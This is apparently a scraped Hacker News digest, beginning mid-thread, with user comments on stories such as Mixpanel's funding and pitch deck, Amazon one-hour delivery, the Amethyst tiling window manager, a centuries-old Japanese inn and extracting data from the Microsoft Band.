We spent every night for months search with magnifying glasses and powerful flash lights while washing and drying our bedding (heat treatment (or cold) is the only sure fire solution to bed bugs). It took many months but eventually we found them all and with the help the pest man's insecticides prevented the infestation from growing out of control. Needless to say we moved and bought a new bed when our lease was up!

Even today years later, I still fear unexplained itching. It think that for me, I could have developed a psychosis where I believe I am being bitting by invisible bugs if we had not found the infestation. It took a long time for my mental state to recover and if it had gone on for 6, 12 months of unexplained bites and itching I may have become very unstable. Itching is very difficult to deal with.

I hope that someone can help these people find an effective way for them individually to deal with the itching even if for some it is only in their minds.

12
Smaug123 1 hour ago 2 replies      
If this really is entirely psychosomatic, then sharing this article is probably one of the worse things you can do with the information.
6
The Slate Programming Language
13 points by tzar  52 minutes ago   1 comment top
1
vertex-four 4 minutes ago 0 replies      
Unfortunately, this seems to be no longer developed - last github commit is from a year ago. It might've been interesting to see another language with the image system.

I've been playing with Smalltalk recently, and it's really interesting as an environment. It has a number of RAD tools built in - the flexible Morphic GUI, the image system allowing you to store state without explicitly dealing with a database, and being able to develop from the same environment that your code runs in, allowing quick turn-around in adding and testing features - and I'm wondering why it's not used more often for line-of-business applications.

7
The pitch deck that helped us get an $865M valuation
211 points by suhail  8 hours ago   59 comments top 15
1
Xorlev 8 hours ago 4 replies      
Mixpanel helped Mixpanel get their $865M valuation. Mixpanel is solving a huge problem with a bunch of software, gobs of data, and smart people. Beyond that, they're pulling in revenue. Regardless of how good, or how brief your deck is at the end of the day your value comes down to your organization, your ability to execute, and your future revenue potential.

I'm not going to say their deck doesn't have value, but I will say it doesn't seem like it has much of one. Maybe that's the point.

2
nlh 8 hours ago 1 reply      
This is a terrific deck (and thank you guys for open sourcing it, even in redacted form - an excellent compromise that's totally fair.)

Take note of a few things:

* They don't use BS "corporate speak" -- no synergies of optimizing user solution metric analysis.

* There's no fluff. Just, none. Problem. Solution. How We're Doing. Why We're Better. What We Want To Do. The Landscape.

And it worked. This should be the baseline for every pitch deck.

3
todd3834 7 hours ago 3 replies      
The slide that helped them get an $865M valuation: https://image.slidesharecdn.com/v1-classified-141218103325-c...
4
timdorr 8 hours ago 1 reply      
Regardless of the "open source" nomenclature, this is actually pretty helpful. Not a lot of sizzle and flash in these slides, just hard numbers and facts. That can be harder for a younger company, where there is less data to pull from. But the matter-of-fact nature of the deck is key. You should have a vision, but you need to back it up with an actual execution plan and reasons for why that plan is achievable.
5
suhail 8 hours ago 2 replies      
Happy to answer questions if other founders have any on the topic of fundraising, pitch decks, etc.
6
DigitalSea 6 hours ago 0 replies      
I wish more companies released their pitch decks like this. Creating a great pitch deck is an artform in itself. Even in redacted form, I think it goes to show you don't need to use technical terms and corporate speak to raise money. Of course having a steady stream of growth also helps as well. Look at that growth graph, impressive.

Seems being concise, using facts and getting to the point quickly is the way to go. I've seen a lot of companies who go as far as creating pitch videos with fancy production, graphics, voiceovers and a soundtrack to try and use fancy visuals to get funding.

Congratulations on the recent funding round. You have a great product Mixpanel.

7
haberdasher 5 hours ago 0 replies      
Wouldn't it have been nice to hear what they actually said while they went through this deck with potential investors? Something like this would be a better share/embed IMO: http://presentio.us/view/p1tcHs
8
capkutay 7 hours ago 0 replies      
The only thing I would really read into in that pitch deck is their revenue and growth rate. VCs are not swayed by hip fonts and background colors (as much as we would all like to believe).
9
curiously 3 hours ago 0 replies      
Let's take a look at their pricing plan

https://mixpanel.com/pricing/

I wonder how much of their MRR X 12 months is multiplied by to reach $865M valuation.

    AVG MRR X 12 X ?? = $865,000,000
I can't fathom what the ?? will be, it would have to be significantly crazy. It isn't 1000.

Is it 100 ($8.6m ARR) ?Is it 50 ($17.2m ARR) ?Is it 25 ($34.4m ARR) ?

What is the average valuation multiple for SaaS? Is it higher or lower than other Startup models (consumer, yearly subscription)?

If one was to replicate a similar valuation with their SaaS what would it take?

10
lukasm 8 hours ago 1 reply      
Why do you hide your growth rate when you show your graph?
11
pekk 6 hours ago 1 reply      
Let's hope it was the company which got them the valuation, because no Powerpoint presentation is worth $865M
12
colinrand 3 hours ago 0 replies      
Mixpanel getting this money at this valuation has more to do with the market conditions than anything else.
13
abannin 7 hours ago 0 replies      
Where do I submit a pull request?
14
espace 8 hours ago 5 replies      
You can't open source a pitch deck can you? Open sourcing is for source code, hence the name. This would go under a Creative Commons licence.
15
ojbyrne 8 hours ago 0 replies      
I understand that VCs value succinct, but not sure what the value of this is to anyone else. Other than to beat home the point that VCs like succinct.
8
Content, Forever
76 points by danso  5 hours ago   15 comments top 13
1
Springtime 2 hours ago 0 replies      
Why 2014 Was the Year of Sony Hacks

Something went wrong. Try another search term?

Simple and to the point, then moving onwards to the next query. This engine is next level.

2
dsugarman 4 hours ago 0 replies      
I would suggest having much more continuity in the content. I think there would be much more value in a probabilistic content retrieval mechanism that doesn't combine pieces of content but understands how interesting and relevant the content is and how long it would take to consume. It really isn't far off from what you have, just a lot more simple and would be much more pleasant to read.
3
kator 3 hours ago 0 replies      
Seems like an engine used to make a content bot site where they hang lots of ads and try to get google and others to send users there via search.
4
cbd1984 4 hours ago 0 replies      
http://i.puthtml.com/content_forever/phpQnrhxq

From Smash Mouth to cryptography and signet rings.

From what I can tell: "Fush Yu Mang" was an album, albums were once made as LPs, which were developed by Western Electric, which was an appendage of AT&T back during the Ma Bell ("We don't care. We dont have to. We're The Phone Company.") days, which had a statue called The Spirit of Communication at its 195 Broadway location, which jumps directly to AUTODIN for some reason (195 Broadway was owned by Western Union... ?), which leads to leased lines, which leads to OSI, PKI, csexps, digital signatures, and signet rings.

The End.

It's like when I take too much caffeine.

5
hotgoldminer 53 minutes ago 0 replies      
Does it have a character limit from whatever text source and then search the last phrase in the source text and repeat ad infinitum?
6
geekam 4 hours ago 0 replies      
>> What Can We Learn From windows?>>> After a lengthy development process, Windows Vista was released on November 30, 2006 for volume licensing and January 30, 2007 for consumers.

...

>>> Many types of aquatic animals commonly referred to as "fish" are not fish in the sense given above; examples include shellfish, cuttlefish, starfish, crayfish and jellyfish.>>The End

7
maxerickson 4 hours ago 0 replies      
What Can We Learn From butter?

It generally has a pale yellow color, but varies from deep yellow to nearly white.

...

In telecommunication and radio communication, spread-spectrum techniques are methods by which a signal (e.g.

9
shkkmo 4 hours ago 1 reply      
Many of the steps seem reasonable, but I couldn't follow some of the associations:

E.G.

"The first large proton synchrotron was the Cosmotron at Brookhaven National Laboratory, which accelerated protons to about 3 GeV (19531968)."

directly to:

"The stated purpose of the one-party state was to ensure that capitalist exploitation would not return to the Soviet Union and that the principles of Democratic Centralism would be most effective in representing the people's will in a practical manner."

Very entertaining.

10
netex 3 hours ago 1 reply      
I thought I would learn something but I didn't take the full 1 minute to read the results on "beer".
11
UhUhUhUh 2 hours ago 0 replies      
Some cadavre exquis?
12
rsync 5 hours ago 0 replies      
Try this. The results are laugh out loud funny. In a good way.
13
curiously 3 hours ago 0 replies      
w.o.w.

Absolutely amazing and chilling at the same time. I typed in "sex" and had 1 minute of free time. It seemed coherent but the subject matter seemed to drift far away. Some tweaking and it would be very convincing.

9
Misfortune Cookie
9 points by sinak  51 minutes ago   2 comments top 2
1
jlebar 1 minute ago 0 replies      
I for one welcome our new convention of giving security vulnerabilities cute logos and names. It elevates their importance in the public eye, which -- I hope -- will elevate the importance of finding, fixing, and avoiding security vulnerabilities among the technoscenti.

I'll go out on a limb and say that if this pattern continues, it may be the most significant legacy of heartbleed.

2
Splendor 3 minutes ago 0 replies      
Scrolling on that site is very frustrating.
10
Amethyst A tiling window manager for OS X
172 points by xj9  9 hours ago   88 comments top 20
1
bombtrack 8 hours ago 9 replies      
I posted this yesterday in the thread about the Rust-written window manager, but it's relevant here as well.

There are plenty of apps that provide varying levels of window-manager functionality to OS X. I would try a couple out and see which feels right to you. I have tried most of them, and personally prefer Moom.

http://manytricks.com/moom/http://mizage.com/divvy/http://ianyh.com/amethyst/http://spectacleapp.com/https://github.com/fjolnir/xnomadhttps://itunes.apple.com/us/app/bettersnaptool/id417375580?m....https://github.com/sdegutis/mjolnir

2
shawn-furyan 8 hours ago 2 replies      
I've been using Amethyst as my WM for a couple months now, and have used XMonad for significant stretches in the past.

Amethyst tries to bring the XMonad experience to OSX. I think it does an admirable job, but there are some distinctions. Amethyst is simpler to set up, and is more forgiving to newcomers. It has a GUI for configuration, and an easily accessible list of commands. It also works on top of OSX's WM, so it's not so enormous a departure, especially compared to XMonad's fairly extreme dismissal of the mouse.

On the down side, XMonad really outshines Amethyst when it comes to performance. Amethyst is downright sluggish, where I've always found XMonad to be very responsive. Still, it's overall a true enough translation, and the sluggishness rarely actually hinders productivity. Overally, I think Amethyst is a capable daily driver, and a great intro to tiled window managers.

3
ianyh 7 hours ago 3 replies      
I'm the Amethyst developer. I'm happy to answer any questions people have. I'm hopping on a cross-country plane flight in about an hour, but I have a layover. I'll try get back to people as soon as I can.
4
platz 8 hours ago 1 reply      
I like tiling managers, but dislike having predefined layouts. Being able to split any tile horizontally or vertically arbitrarily many times is the way to go (i.e. i3-style). Would like to see tiling wm authors to consider this option when starting new projects.
5
DevMonkey 6 hours ago 1 reply      
For Windows I just stumbled across MaxTo (http://maxto.net/) I've been using it for a couple of days and I'm really impressed.
6
pmoriarty 8 hours ago 2 replies      
Wow. This has focus follows mouse! (though they call it "mouse-follows-focus", for some reason)

I've been told focus follows mouse was impossible on OS X.

7
dylanz 7 hours ago 1 reply      
First off, thank you ianyh!! Tiling window managers are a huge productivity tool, and when I see people manually resizing windows, it's painful to watch. I'm on OSX now, but used XMonad extensively when I was on a *n?x distro.

At the moment, I'm using Spectacle for OSX. http://spectacleapp.com/. Are there reasons I should use Amethyst instead? I'd love to see a feature matrix or something in you FAQ about the other options, and what Amethyst brings to the table.

8
nchuhoai 6 hours ago 0 replies      
I've used BetterTouchTool's tiling functionality for the most part, but I just got a 4K monitor and most granular most tiling managers can do is quarters. I wish there was an out-of-the-box solution that allows me to just tile my space more granularly
9
0942v8653 7 hours ago 0 replies      
I use a window manager, but really only to have a hotkey that fullscreens a window (three, actually: one for current, one for left and one for right display). With 2 displays, I find that I have all I need with just an editor window and a documentation browser window. I guess I have smaller displays than most people because if I resize a window (browser windows mostly) beyond about 2/3 its layout gets messed up or a horizontal scrollbar appears.
10
RussianCow 8 hours ago 6 replies      
I really just want a window manager that allows windows to snap to each other and the edges of the screen when resizing or moving them. Does something like that exist? I don't care for the pre-defined layouts or hotkeys, I just want to be able to visually drag/resize my windows and have them take up the most optimal amount of space.
11
oDot 4 hours ago 1 reply      
Seeing this (and others like it), what's the benefit of having a tiling-only WM over a floating WM with tiling capabilities?
12
rcknight 9 hours ago 0 replies      
Weird, I was literally just googling for this and found Amethyst. Seems nice.

I've noticed it gets a little slow to rearrange things sometimes with lots of windows but the functionality I need is all there.

Works great with my three screen setup too, which many tools like this don't.

13
axotty 8 hours ago 3 replies      
Am I the only weirdo who just uses multiple workspaces with ctrl-arrow and cmd-tab like a mad man? I genuinely enjoy it, especially with a second monitor.

I, maybe, have one or two apps sharing a single workspace. Most apps are in full screen.

14
Vecrios 9 hours ago 1 reply      
What's the benefit of using this vs. WMs like SizeUp?

I'm asking this question because I'm quite comfortable with SizeUp and don't understand if learning how to use a WM is worth it.

15
pmoriarty 8 hours ago 1 reply      
Does anyone know whether there's any chance i3 could be ported to OS X's native windowing system (whatever it's called) ?
16
hugg 6 hours ago 2 replies      
Looks really weird with the window shadows though.
17
gngrwzrd 5 hours ago 0 replies      
it's ok, I prefer to be able to set windows where I want them and assign keyboard shortcuts. I was the original author of Breeze, now autumn apps has it available - http://autumnapps.com/breeze/index.html
18
anoxic 9 hours ago 0 replies      
Use this every day. Works great.
19
cheshire137 3 hours ago 0 replies      
Divvy is sufficient for me.
20
salas106 8 hours ago 0 replies      
Use it also. Cool tiling manager.
11
A Japanese inn owned by the same family for 1,300 years [video]
137 points by Thevet  7 hours ago   34 comments top 9
1
datamatt 6 hours ago 3 replies      
Not actually the same family, typically the new owners will "adopt" a son, who is just the highest ranking manager: http://en.wikipedia.org/wiki/Japanese_adult_adoption
2
fotografritz 2 hours ago 1 reply      
I'm the guy who made this video, so I want adress some questions from this thread. Really interesting discussion by the way, I'm happy so many people take an interest in this film!

Not really family/adoption:

To be honest, the whole history of the Houshi family is kind of a mistery. There was no real documentation in paper back then. No photos, and paintings or such were only for rich people. Yet, the whole town kinda grew around the hot springs and this one hotel in particular. So the history of the hotel and the family is very much connected with the history of the town. That's also where the proof for the Guinness Bureau came from. They wouldn't just accept them saying "yea, we old."

What changed in 2011:An even older hotel submitted their application.

Also: as far as I found out, that older hotel is not a straight "same-family" business, or at least not anymore. I'm a bit sceptical of that posted source below. There's an association for family businesses older than 200 years AND still running, and that hotel is not part of that, Houshi is.

The daughters motivation:I shot this film over the course of six days, in April and in June. When I was doing the interviews in April, the daughter didn't actually know that her father decided that she should take over. I was the one who told her during the interview (assuming then she was aware of it of course). She officially started in May, and when I came back in June, she was much more adjusted. She's actually doing pretty well. There's also a second son, even working in the hotel, longer than the daughter. but according to the father, he's not smart enough to manage the inn. The daughter is actually much stronger and smarter than she thinks she is. That's why the father chose her. In 1,300 years, no woman was the official owner of the inn. However, they were allowed to be "temporary owners" until the son came of age or someone was adopted. Yet, the father considers giving the daughter now the title of Zengoro. She would be the first woman in 1,300 years to wear that title. But it's not final yet. I consider going back there in a couple of years to see what's changed.

The first born son gets trained from day one to become the owner. The daughter wasn't properly prepared. Yet, she loves her family dearly and is caught between her love, obligation and duty. For someone carrying the weight of 1,300 years and 46 generations, she is doing remarkably well.

3
jpatokal 1 hour ago 1 reply      
The inn's English homepage: http://www.ho-shi.co.jp/jiten/Houshi_E/home.htm

Rates start from Y9900/person (~US$83) for a midweek stay with two meals, although better rooms and meals can cost considerably more.

Reviews seem a bit mediocre though: this is a large ryokan geared for large groups, and not particularly luxurious as far as these things go.

4
Ronsenshi 6 hours ago 1 reply      
Very interesting.

I always wondered what would be morally just position on such long standing establishments when it comes to inheritance of responsibility.

On the one hand kids of such family shouldn't be tied to the family business if they don't find it fulfilling. On the other hand if they won't continue the line traditions might die and with them such old an interesting places as this one or any other.

But as datamatt writes, I guess adult adoption does help with that. If kids in such family feel that they are not up to the task, their parents can adopt a person (a man in this case) who will continue with this tradition.

5
alexyes 5 hours ago 1 reply      
"Until 2011, it held the record for being the oldest hotel in the world."

I wondered what happened in 2011

6
cookrn 6 hours ago 0 replies      
One of the "world's oldest continuously ongoing independent company" [0] also hails from Japan, although it became a subsidiary of another company awhile back

[0] https://en.wikipedia.org/wiki/Kong%C5%8D_Gumi

7
cLeEOGPw 5 hours ago 3 replies      
The daughter seems to be very depressed and clearly isn't intending on continuing this tradition.
8
suyash 3 hours ago 1 reply      
Anyone having good luck watching the video? I have tried all 3 major browsers and none are buffering and playing the media seamlessly. Maybe it's Vimeo's player that is bad.
9
icosahedron 5 hours ago 0 replies      
I hope they find someone to adopt or marry who will care for this hotel.

As someone else pointed out, the daughter seems to be sad. I hope she is able to find someone to make her happy and is able to let her do what makes her happy.

12
Amazon Unveils One-Hour Delivery Service
219 points by spew  11 hours ago   112 comments top 19
1
morgante 7 hours ago 3 replies      
I just placed an order with this new service (some HDMI cables for our office).

The selection is pretty decent, definitely comparable to Google Shopping Express.

One very odd note though: they ask for a variable tip to the delivery courier (something Google doesn't do). So even for "free" 2 hour delivery, you're paying for delivery. While I see how this is better for the courier, I think it's a big mistakepeople hate navigating the social dilemma of how to tip properly, and solving social dilemmas is a key advantage of digital services.

2
jcr 10 hours ago 1 reply      
Just as Amazon is trying to use 1 hour delivery to compete betteragainst brick-and-mortar companies, Google is trying to help thebrick-and-mortar companies compete with Amazon by providing a competingdelivery service called "Google Express" (previously called "GoogleShopping Express") [1]. It's been mentioned a few times on hn [2,3].

[1] https://www.google.com/shopping/express/

[2] https://news.ycombinator.com/item?id=8037108

[3] https://news.ycombinator.com/item?id=8452337

3
mooreds 8 hours ago 10 replies      
It's hard for me to see how this doesn't hurt local vendors badly. Of course, it depends on what the the 25,000 items are, but that was one of the key differentiators between Amazon and local stores--if you needed something and you needed it now, the local store was the only option (things like cabling for a new TV, gifts for a party that night, etc).

Now, for prime members in NYC at least, Amazon is a viable option.

What other moats do local stores have? Amazon wins on:

   * selection   * cost   * convenience   * reputation   * knowledge (this depends on the local store)
What does the local store win on?

   * feel good factor (supporting local business and employment)   * hold the item in your hand (not sure there is one word for it in English, but the Germans probably have one)
It's a draw on

   * I need it now
Interesting times, indeed.

4
guelo 3 hours ago 1 reply      
What I don't understand about the big retailers is why they haven't been doing something similar all along to compete with Amazon.

Amazon has been building warehouses all across the country near cities to reduce shipping times. But the retailers already have what amounts to hundreds of warehouses at every population center, plus the inventory management systems. Why haven't they put their inventories online and offered same day delivery to neutralize Amazon?

5
BrandonY 6 hours ago 0 replies      
Somewhere, Kozmo.com CEO Joseph Park is reminding someone that this is Jeff Bezos's second attempt at one hour delivery, and that he was already doing this for Bezos back in the 20th century.
6
comrade1 4 hours ago 0 replies      
Time to order KY lubricant and the Sports Illustrated swimsuit edition delivered to a bathroom stall at SFO...

(if you don't remember Kozmo, this was done by a reporter during the last dotcom boom/bust as a joke)

7
jtchang 10 hours ago 2 replies      
I'm pretty sure the logistics of 1 hour delivery can get pretty insane. However what I am really looking forward to is real time delivery anywhere.

And how about returns? Can I return stuff in one hour too?

8
smackfu 9 hours ago 2 replies      
I'm more impressed that the two-hour delivery is free.
9
Instacartlove 7 hours ago 0 replies      
Having the ability to pickup and deliver from multiple locations throughout a city like Postmates or Instacart does is a huge advantage. At least for a one hour delivery. Density of drivers in a city is an important factor as well. If you can route a driver to a location nearby instead of a single warehouse you can be more efficient. Instacart and Postmates also both have high frequency categories that they can use to leverage less frequent items, e.g essentials over time and potentially at lower costs.
10
nateberkopec 8 hours ago 1 reply      
This headline could've read: "Amazon relaunches Webvan".

Very interesting how ideas from the first bubble re: brick-and-mortar are coming back.

11
Rygu 7 hours ago 0 replies      
Just heard about Shyp yesterday. Seems like it's the same idea but selling the concept of regular people helping each other for a more personal service (like Uber, Lyft). I kind of like that approach. http://www.shyp.com/heroes
12
free2rhyme214 8 hours ago 0 replies      
What most don't realize is that Amazon is taking on Fedex, UPS, and the USPS by doing it themselves for profit. This is actually very smart if you can solve the logistics problem long term because this model can be leveraged in many other cities.
13
shalbert 9 hours ago 2 replies      
How can they get to places within an hour and make a worthwhile margin of profit?
14
marban 9 hours ago 0 replies      
Are they outsourcing the couriers in this case? The promo video looks like as if these guys are sourced straight from a Chrome Industries / Rapha commercial.
15
quackware 9 hours ago 2 replies      
Unfortunately only in the 10001 zip code.
16
Dirlewanger 9 hours ago 4 replies      
Can't wait to see how awesome the work environment will be for these couriers! Probably much like Uber's drivers: under constant pressure to meet a quota (in this case, probably minimizing the number of missed 1 hour marks), and if you're injured/hit/cause an accident, it's on you and the employer will be nowhere to be found.
17
mrfusion 9 hours ago 2 replies      
Wouldn't four hours or anything same day be just as good? Why not save some costs there?
18
redgrange 10 hours ago 0 replies      
19
curiously 2 hours ago 0 replies      
Meanwhile in Canada...
13
State of the MirageOS: an OCaml unikernel [video]
25 points by zellyn  4 hours ago   3 comments top
1
zellyn 4 hours ago 1 reply      
via https://lobste.rs/s/hgknhb/state_of_the_mirage_an_ocaml_unik...

Submitted here, to get a wider audience, and ask: does anything in Rust preclude this from being done in Rust rather than OCaml? Sounds like a nice idea...

14
A Complete List of .Gov Domains
42 points by konklone  4 hours ago   6 comments top 3
1
konklone 3 hours ago 2 replies      
For some extra clarification: this is the official list, as released by the General Services Administration, the part of the government that runs the registry.

Some of these -- the domains for the federal government's executive branch -- were already public. This includes the rest of the federal government (e.g. Congress, the courts), as well as all the .gov's in states, territories, counties, cities, and native tribes.

There's about 5,300 of them.

2
dsl 41 minutes ago 0 replies      
I believe this document is the first public acknowledgement on the government side of the relationship that the Laboratory for Physical Sciences at the University of Maryland is an NSA facility. Even the agencies own NSA.gov domain is listed as controlled by the "Department of Defense."
3
codyb 2 hours ago 0 replies      
I'm actually surprised at this action with the recent rash of actions by cracker collectives like Anonymous aimed at local and national governments.

However, I do appreciate the transparency.

I guess some of the interesting things you might be able to do include analyzations like!) What states counties have more .gov websites for their municipal functions2) What states counties have the most disparity in municipal function websites

There's probably some interesting things you could ascertain from this data set given a weekend and some drive.

15
Memo: Open-source note-taking software with hack value
18 points by unixguy  3 hours ago   discuss
16
The inventor of the SR-71's rules for project management
83 points by valarauca1  7 hours ago   26 comments top 5
1
fsloth 6 hours ago 4 replies      
I resent calling Kelly Johnson merely the inventor of SR-71. He was the father, the project manager and the organizational hustler who found Skunk Works and defined it's working culture. He was a legendary aviation engineer but also really understood how to get a team of experts to produce results and to co-operate with the manufacturing and operations to create feats of engineering.

He found and ran a lean organization on grit and triftiness when toyota production system was taking it's baby steps in japan.

I heartily suggest Ben Rich's 'Skunk works' to anyone who gets a kick out of a true story what it actually means in terms of output when an innovative engineering team actually works lean... in hardware.

2
ixtli 2 hours ago 2 replies      
"Because only a few people will be used in engineering and most other areas, ways must be provided to reward good performance by pay not based on the number of personnel supervised."

The lack of this is the #1 problem with professional software engineering.

3
guiomie 5 hours ago 4 replies      
From the link: According to the book "Skunk Works" the 15th rule is: "Starve before doing business with the damned Navy. They don't know what the hell they want and will drive you up a wall before they break either your heart or a more exposed part of your anatomy."

any examples out there?

4
dang 6 hours ago 0 replies      
We changed the url from http://valarauca1.blogspot.com/2014/12/kellys-14-rules-of-pr... to the Wikipedia article it points to, which appears to contain the originals.
5
tdicola 5 hours ago 3 replies      
I find HN's infatuation with SR-71 kind of amusing. I think the site should have a logo that's the SR-71 flying over a globe or something similar. If you think about it the Y logo kind of looks like an SR-71... :)
17
Mixpanel (YC S09) Raises $65M to Build Predictive Data Tech
120 points by lightcatcher  8 hours ago   18 comments top 6
1
sqs 4 hours ago 1 reply      
Congrats to Mixpanel on the raise. I have heard many great things from them and used them at a previous company. They've done a great job of making it a no-brainer for startups to start using more advanced analytics tools (not just Google Analytics) from day 1. I think we're all better off for the ability it gives product developers to improve their product based on actual usage--since it means the overall quality of products is far better than if vanity metrics drove all product decisions.

I noticed they mentioned Heap Analytics (https://heapanalytics.com/) as one of their competitors. We've been using Heap for over a year and it seems like the logical and magical next step in analytics. Mixpanel gave you smarter analytics on things you had the foresight to track, but Heap automatically tracks everything from the day you integrate it. That means you can get smart analytics even on things you didn't have the clairvoyance to start tracking 6 months ago, or didn't have the resources to insert tracking code in.

For startups, Heap's automatic and retroactive tracking is huge. It means we can iterate on product features and marketing/outreach schemes way more quickly while still getting insight into what's successful and what's not. It's not perfect--a couple times we've added special class names to our HTML elements so Heap can distinguish them, but that's still easier than adding manual tracking code--but it's a huge improvement over the old way.

I noticed Heap has a page comparing themselves with Mixpanel (https://heapanalytics.com/compare/heap-vs-mixpanel) but I don't see anything similar from Mixpanel's POV. I'd be curious to hear what Mixpanel's plans are in this area (automatic/retroactive tracking).

2
nathas 8 hours ago 8 replies      
I really wish they would invest in helping their users answer the "Why" question more. Why did users click that link 5000 times? Why is this funnel dropping off? Why did the time-to-first-interaction increase?

These are questions for the business, but I feel like Mixpanel could add so much more context. "We noticed that 'time to first interaction' has gone down with 'watched home page video'." That would at least be a clue.

MP has the data, but all of that analysis is manual (or was, last time I used it).

3
rubyrescue 8 hours ago 0 replies      
Congrats to the Mixpanel team. They have always been very supportive when we've had questions. When we had a problem with a particular statistic a few months back, they actually came on-site to diagnose.
4
Yadi 8 hours ago 0 replies      
Kudos to the hardworking team. I'v always thought that Google would acquire them, but their commitment and goal driven startup means a lot to their clients at this point, which is awesome.
5
snowmaker 8 hours ago 0 replies      
Congrats to Suhail and team. They have done absolutely incredible work with Mixpanel, building the world's best analytics solution, starting from a tiny team and against stiff competition.
6
thorpus 8 hours ago 0 replies      
2015 is so going to be the year of personalization and actionable analytics. Seeing this stuff everywhere.
18
Barcode-in-barcode attacks [pdf]
34 points by sp332  6 hours ago   2 comments top
1
jszymborski 57 minutes ago 1 reply      
It's interesting, but is it much of an attack? Ok, so you can determine what OS your phone is running, but you can do that by coding a QR code that brings them to a webpage that registers it with javascript; you need to direct them to a site regardless to collect your findings from this attack.
20
Female Founders Conference 2015 applications are open
82 points by katm  7 hours ago   51 comments top 6
1
d0m 39 minutes ago 0 replies      
I understand where a lot of people commenting here come from, but I think Female only tech events are actually amazing.

I believe the main reason why there's less women in tech is because there's less women in tech(!) It's really hard to jump in a new field where you're the extreme minority. Just as a crude example, imagine getting into nursing school as a guy. That would take a lot of guts. I know because I have a friend who did it and you can easily imagine the kind of comments he's getting all the time from families, strangers, administrators, etc. However, if there were more guys in nursing, it wouldn't be as hard.

You can also think about being gay in San-Francisco right now vs 50 years ago. Yes, a lot of things changed, but part of the reason why it's getting much better is because there simply are more gays, you know you're not alone.

I'm not sure if this was a good example. But women in tech are a bit similar. It's hard to jump in when you're the minority. It's much easier to take the easy route and get a profession where there's already a good ratio of men/women.

Why am I saying all this? Because I think women-only events help girls looking to move into tech understand that there actually are women in tech. If we'd only have mixed-in events, the few women in the crowd would easily be missed by the overwhelming majority of guys.

Someone also posted something about Black, Latino/Hispanic Founders. That's extremely related. A black friend of mine told me that one of the hardest thing about being black in the tech community is that he's almost always the only one. It takes a lot of guts to be the only different one in the room. Some people like that, but for lots of people it's hard. Personally, as an introvert, I'd hate to have everyone in the room looking at me the second I enter the room, all the time.

2
viiralvx 3 hours ago 0 replies      
When are we going to have the Black or Latino/Hispanic Founders Conference, YC?
3
sremani 3 hours ago 1 reply      
I am not against conferences like these - women to women connection is different from women to mixed crowd. Actually, I would not mind men only conferences either if they improve the social environment for all the attendees.
4
jcr 5 minutes ago 0 replies      
Anyone can apply to attend the Female Founders Conference so it's not"female only" as some have mistakenly claimed. If you are notable in thegiven specialization and you want to speak at the conference, I'm sureyou could contact them and ask if they need more speakers. Like mostYC-related events and functions (e.g. funding batches, startup school,hack weekend, etc.), the main problem they face is most likely limitedspace/resources. If you know anything about YC, then you know they willoptimize for quality and growth/scale. If you're unable to attend, YCdoes provide videos of the talks [1] so you can still learn from them.

Though I'd definitely learn a lot at this conference, I'm not going toapply for an invitation because I'd rather see the limited invitationsgo to people who can make the most of them. I'm not founder material, soI should wait until the videos get released. If I was mistakenly givenan invitation, I'd politely and humorously report it as a bug in theiroptimization algorithms. ;-)

HN users tptacek and cpercival are known representatives of a specificminority in tech, namely, people with a reasonable grasp of crypto. Ifthere was a specialized conference of this crypto-cogent minority, thepeople who would gain the most from the conference are either alreadycrypto-cogent, or are considering becoming crypto-cogent. The rest of uscrypto-ignorant people (myself included as an admitted crypto-failure)are much better off always trying to learn from the experiences theygenerously share. If the title of this story was, "Crypto Conference2015 Applications Are Open," I'd like to believe people on HN would notbe arguing whether specialized cryptography conferences should exist.

All conferences are specialized in some sense. Learning from the uniqueperspectives and experiences of said specialization is one of the mainreasons for going to any conference. The other reason is networking withyour peers. The specialization can be a field, topic, group, or someother commonality. In this case, the specialization is Female Foundersand the chance to learn from them is a fantastic but rare opportunity.The same is true for any specialized group of notable people speaking ontopics where they have the benefit of experience and perspective.

My challenge to you, the regular HN user, is can you tell me somethinginteresting about the accomplishments of any of the speakers?

I'll start. Jessica Livingston wrote a book called "Founders At Work"and it's one of my absolute favorites. I've nearly broken the binding onmy copy with all the sticky-note page markers. Though my server willprobably melt from the load, proof of my assertion is available [2].

[1] https://www.youtube.com/playlist?list=PLQ-uHSnFig5PSIanlQ_x6...

[2] http://designtools.org/pix/DSCN0022.JPG

5
taprun 6 hours ago 8 replies      
I always wonder if these "female only" conferences, awards and events are beneficial for women.

Many folks might (mistakenly) see them as an admission that women can't hack it on a level playing field. Such thoughts would only serve to harden their chauvinistic mental models and cause gender discrimination to be more (rather than less) likely in the future.

6
ps4fanboy 3 hours ago 1 reply      
If women only conferences are good at helping women network and communicate safely, I really think we could apply the same argument to men, do we just disregard men who are to afraid or feel uncomfortable around women because we already have too many successful men who dont suffer from this problem?
21
Extracting My Data from the Microsoft Band
78 points by lazyjeff  8 hours ago   21 comments top 9
1
mabbo 8 hours ago 6 replies      
That's a bit disappointing. I was hoping to get one of these bands, but to hear them say that all data is stored on Microsoft's cloud is a bit disconcerting.

I wanted to track my heart rate while I run. I didn't want to let a large company have direct access to my health information.

2
Maarten88 6 hours ago 0 replies      
It seems to use a standard odata format over ssl with oauth token security. I wonder if it's possible to simply attach an Excel worksheet to the data feed (https://support.office.com/en-us/article/Connect-to-an-OData...)
3
pgbovine 3 hours ago 0 replies      
"Clearly, to get sleep events, the app is constructing a REST call."

This is gold :) Nice write-up, Jeff.

4
TazeTSchnitzel 8 hours ago 1 reply      
Interesting they store so little on the device. Does the Band generate a lot of data?
5
sengstrom 5 hours ago 0 replies      
A nice hack and a good list of the things you may want to fiddle with if you want to explore phone applications calling home just in general.
6
ubercow 6 hours ago 0 replies      
The most amusing part for me is the domain name dns-cargo.comSeems like a random choice. Wonder if this was just some spare throwaway domain they had laying around.
7
lhl 4 hours ago 0 replies      
I started poking around w/ mitmproxy the other day as well, since I had started to get a little tired of waiting (Microsoft has promised an open API/SDK of some sort, but there haven't been any updates to any of the software since release) w/ similar results. (I did this against the iOS app).

So I'll just post a couple notes:

* auth appears to be using OAuth WRAP (deprecated as a spec, but Microsoft appears to use it for Live logins), so I'm sure could be pretty easily extracted for an API library

* As mentioned the API mostly talks to an endpoint on and the returns are gzipped JSON except for a PUT to prodwus0sts.blob.core.windows.net for the binary log of your actual data (there's a subsequent PUT that then sends the UploadId and some other metadata to the API server)

People have mentioned wanting to avoid sending your data to the cloud completely, and that should be completely possible. The easy way atm is that you could just mitm the endpoints and sync as normal w/ the app.

However, there are at least a couple of people that have successfully reverse-engineered the BTLE protocol, although I haven't seen anything fully published yet. This appears to mostly/primarly be based on digging through the Windows client's DLL.

